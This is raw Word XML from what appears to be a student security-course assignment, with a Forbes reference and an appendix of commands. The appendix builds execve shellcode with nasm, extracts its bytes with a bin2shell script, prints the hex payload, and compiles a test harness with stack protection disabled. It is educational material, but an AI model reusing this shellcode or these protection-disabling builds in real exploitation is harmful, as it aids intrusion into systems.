        <w:t xml:space="preserve"> and put </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EN.650.431 and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">both student names and in subject  References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:spacing w:after="60" w:line="290.618181818181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A. Greenberg. “iPhone Super-Hacker Comex, Let Go From Apple, Goes To Work For</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:after="200" w:line="293.23636363636365" w:lineRule="auto"/>
        <w:ind w:left="720"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Google”. Forbes Online Magazine, April 24, 2013. Available at:</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0000ff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.forbes.com/sites/andygreenberg/2013/04/24/iphone-super-hacker-comex-letgo-from-apple-goes-to-work-for-google/#fe1536a60528</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:line="280.145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80.145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80.145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80.145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P.S. commands and results we mentioned:l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shebin2shell.sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in $(objdump -d $1 |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo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nasm -f elf64 shell_code_hw.asm -o shell_code_hw.o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ld shell_code_hw.o -o shell_code_hw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 bin2shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./bin2shell.sh shell_code_hw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output: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\xb8\x00\x00\x00\x00\x48\xbb\x00\x20\x40\x00\x00\x00\x00\x00\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x43\x10\xb8\x3b\x00\x00\x00\x48\x8d\x3b\x48\x8d\x73\x08\x48\x8d\x53\x10\x0f\x05</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gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./shell-testing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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        <w:color w:val="5c5c5c"/>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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        <w:color w:val="5c5c5c"/>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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        <w:color w:val="5c5c5c"/>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forbes.com/sites/andygreenberg/2013/04/24/iphone-super-hacker-comex-let-go-from-apple-goes-to-work-for-google/#fe1536a60528" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.forbes.com/sites/andygreenberg/2013/04/24/iphone-super-hacker-comex-let-go-from-apple-goes-to-work-for-google/#fe1536a6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